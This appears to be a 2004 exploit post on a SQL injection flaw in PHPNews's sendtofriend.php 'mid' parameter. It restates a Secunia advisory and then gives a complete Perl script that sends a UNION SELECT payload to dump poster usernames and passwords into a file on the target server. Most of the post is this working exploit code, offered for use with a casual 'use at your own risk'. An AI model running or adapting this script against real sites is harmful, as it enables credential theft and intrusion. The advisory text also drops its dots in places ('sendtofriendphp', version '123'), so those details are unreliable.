SQL Injection vulnerability in PHPNews

11/25/2004

Description:
A vulnerability has been reported in PHPNews, which can be exploited
by malicious people to conduct SQL injection attacks
Input passed to the "mid" parameter in "sendtofriendphp"
is not properly sanitised before being used in a SQL query This can
be exploited to manipulate SQL queries by injecting arbitrary SQL code
The vulnerability has been reported in version 123 Other versions may
also be affected

Provided and/or discovered by:
Reported by vendor

http://secunia.com/advisories/13300/ 

simple exploit-test written by ruggine

ruggine@autistici.org

n.b. Use at your own risk! :P
                             
--------------------------------- snip here
#!/usr/bin/perl -w

use Socket;
unless (@ARGV > 2) { die "usage: $0 mid_number /path_to_phpnews/ ip_host\n". 
                     "f.e. phpnews 1 /phpnews/ 192.168.0.1\n"};
my $mid_number = $ARGV[0];
my $path_to_phpnews = $ARGV[1];
my $host = $ARGV[2];
my $port = 80;
my $EOL = "\015\012";

my $inj = "%20union%20select%20username,password%20from%20phpnews_posters%20into%20outfile%20'/tmp/ghghgh'";

my $packet = "GET " . $path_to_phpnews . "sendtofriend.php?mid=" . $mid_number . $inj . " HTTP/1.0" . $EOL. $EOL;

my $protocol = getprotobyname('tcp');

my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port,$iaddr);

socket(SOCKET,PF_INET,SOCK_STREAM,$protocol) or die "no socket :-(";
connect(SOCKET,$paddr) or die "no connect :-("; 
send(SOCKET,$packet,0) or die "no send :-(";
@lines = <SOCKET>;
print @lines;
close SOCKET or die "no close :-("; 
-------------------------------------------end snip